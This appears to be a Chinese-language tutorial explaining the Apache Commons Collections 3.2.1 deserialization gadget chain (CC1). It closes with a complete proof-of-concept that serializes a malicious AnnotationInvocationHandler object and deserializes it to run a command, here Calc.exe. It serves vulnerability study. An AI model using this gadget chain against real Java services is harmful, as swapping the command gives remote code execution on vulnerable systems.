文章目录
- 前言
- 一、漏洞爆出
- 二、复现环境
- java集合框架
- 问题
- JVM
- 反射
- 三、Apache Commons Collections漏洞原理≤3.2.1
- CC关键类
- 调用链路
- POC构造思路
- POC
前言
Apache Commons Collections是一个扩展了Java标准库里的Collection结构的第三方基础库,它提供了很多强大的数据结构类型和实现了各种集合工具 类。作为Apache开放项目的重要组件,Commons Collections被广泛的各种Java应用的开发。可以在Apache官网下载CC的jar文件和源代码,用于代码审计。
Java集合框架:称为Collection,是Java中存在的一系列操作List、Set和Map的类的集合。Commons Collections扩展了集合框架,增强了很多功能。
一、漏洞爆出
·2015.01.28 Gabriel Lawrence和Chris Frohoff
https://speakerdeck.com/frohoff/appseccali-2015-marshalling-pickles-how-deserializing-objects-can-ruin-your-day
https://github.com/frohoff/ysoserial
·2015.11.06 FoxGlove Security @breenmachine
https://commons.apache.org/proper/commons-collections/release_3_2_2.html
https://issues.apache.org/jira/browse/COLLECTIONS-580
二、复现环境
jdk1.7.0 80
IDEA Project Structrure, Settings–Java
compile等设置成java7
Apache Commons Collections 3.2.1
java集合框架
问题
1、哪里出现了可以执行任意代码的问题?
2、序列化的payload怎么构造?
JVM
Java代码运行原理:
1、源码
2、编译器(javac)编译为字节码.class文件
3、各平台JⅣM解释器把字节码文件转换成操作系统指令(Java能达到跨平台的原因)
反射
在程序运行的时候动态创建一个类的实例,调用实例的方法和访问它的属性
Class —— Instance
Person —— new Person(“laow”)
三、Apache Commons Collections漏洞原理≤3.2.1
CC关键类
○InvokeTransformer
利用Java反射机制来创建类实例
○ChainedTransformer
实现了Transformer链式调用,我们只需要传入一个Transformer数组 ChainedTransformer就可以实现依次的去调用每一个Transformer的transform()方法
○ConstantTransformer
transform()返回构造函数的对象
○TransformedMap
调用链路
POC构造思路
1. InvokeTransformer
反射执行代码
2. ChainedTransformer
链式调用,自动触发
3. ConstantTransformer
获得对象
4. TransformedMap
元素变化执行transform,setValue——checkSetValue
5. AnnotationInvocationHandler
readObject 调用Map的setValue
InvokeTransformer中有一个transform方法,可以获得一个对象(Class.forName()或input.getClass()两种获得类对象的方法).class,
然后获得对象的方法,调用invoke触发其方法
有了这个方法,我们总不能认为这个方法会自己去跑吧!!!
于是,我们通过invokerTransformer = new InvokerTransformer("exec",new Class[]{String.class},new String[]{"Calc.exe"}设置函数名称exec,类型,值 然后Object input = Runtime.getRuntime();创建外部程序执行命令的方法对象 传给invokerTransformer的transform方法invokerTransformer.transform(input);这个方法就会自动进行如下操作完整的Runtime.getRuntime().exec("./p.exe");实现Class cls = input.getClass();//获取Runtime.getRuntime()对象//获取Runtime.getRuntime()对象的方法(exec,方法类型)Method method = cls.getMethod(this.iMethodName, this.iParamTypes);通过invoke触发Runtime.getRuntime()对象的所有方法,这里填入的值是Calc.exereturn method.invoke(input, this.iArgs);
完整代码
public static void main(String[] args) {//创建实例传入构造方法参数(函数名 参数类型 参数值)InvokerTransformer invokerTransformer = new InvokerTransformer("exec",new Class[]{String.class},new String[]{"Calc.exe"});try {Object input = Runtime.getRuntime();invokerTransformer.transform(input);}catch (Exception e){e.printStackTrace();}}
到这里,我们自己去写的就可以实现弹出计算器了,但是在实际的攻击中,我们要做到这点,利用现成的方法去做还是比较困难,
所以我们又找到了ChainedTransformer
我们只需要传入一个Transformer数组ChainedTransformer就可以实现依次的去调用每一个Transformer的transform方法。
通过ConstantTransformer类的transform方法获取一个对象类型,如transform参数是Runtime.class时,调用ConstantTransformer类的transform方法,执行后返回java.lang.Runtime类
可能就会有人要问传入一个Runtime.getRuntime,最后返回这个一个对象,这样有啥意义,自己觉得没啥意义,唯一的意义就是它是Transform的子类,在CC链中很有意义!相当于实现调用invokerTransformer.transform(input);后,会执行的Class cls = input.getClass();
到这里,就又会有一个问题,chainedTransformer.transform(null);又凭什么能自动执行呢,所以我们又找到了下面的类TransformedMap,那么我们要怎么让他来触发transform,于是找到TransformedMap中的checkSetValue,那么什么时候又会执行checkSetValue呢,所以又找到了TransformedMap的父类AbstractInputCheckedMapDecorator中的setValue
那么一个Map的setValue什么时候会触发呢,当其中的元素增加、删除、修改的时候就会调用setValue,所以我们需要找一个对象,他在反序列化的时候,会给一个Map对象赋值,或者调用setValue。
于是我们就找到了AnnotationInvocationHandler,它在反序列化时,调用readObject,他在里面用了Entry(这个实质上就是Map)在其中调用了setValue
通过TransformedMap.decorate 返回一个键为null 值为transformedChain的一个TransformedMap,这里的hashmap键值对啥都行,TransformedMap实例化需要,而最终利用的就是这个对象中的entry的setValue方法,通过setValue可以触发Map的checkSetValue,从而触发transform
POC
Transformer[] transforms = new Transformer[]{//获得Runtime类对象new ConstantTransformer(Runtime.class),//传入Runtime类对象,反射执行getMethod获得getRuntime方法new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",new Class[0]}),//传入getRuntime方法,反射执行invoke方法,得到Runtime实列new InvokerTransformer("invoke",new Class[]{Object.class, Object[].class},new Object[]{null, null}),//传入Runtime实列 ,执行exec方法new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"Calc.exe"})
};ChainedTransformer chainedTransformer = new ChainedTransformer(transforms);Map innermap = new HashMap();
innermap.put("value","value");
Map outermap = TransformedMap.decorate(innermap, null, chainedTransformer);
//构造包含恶意map的AnnotationInvocationHandler对象
Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor cst = cl.getDeclaredConstructor(Class.class, Map.class);
cst.setAccessible(true);
Object exploitObj = cst.newInstance(Target.class, outermap);//序列化
FileOutputStream fos = new FileOutputStream("payload.bin");
ObjectOutputStream oos = new ObjectOutputStream(fos);
oos.writeObject(exploitObj);
oos.close();//反序列化
FileInputStream fis = new FileInputStream("payload.bin");
ObjectInputStream ois = new ObjectInputStream(fis);
Object result = ois.readObject();
ois.close();
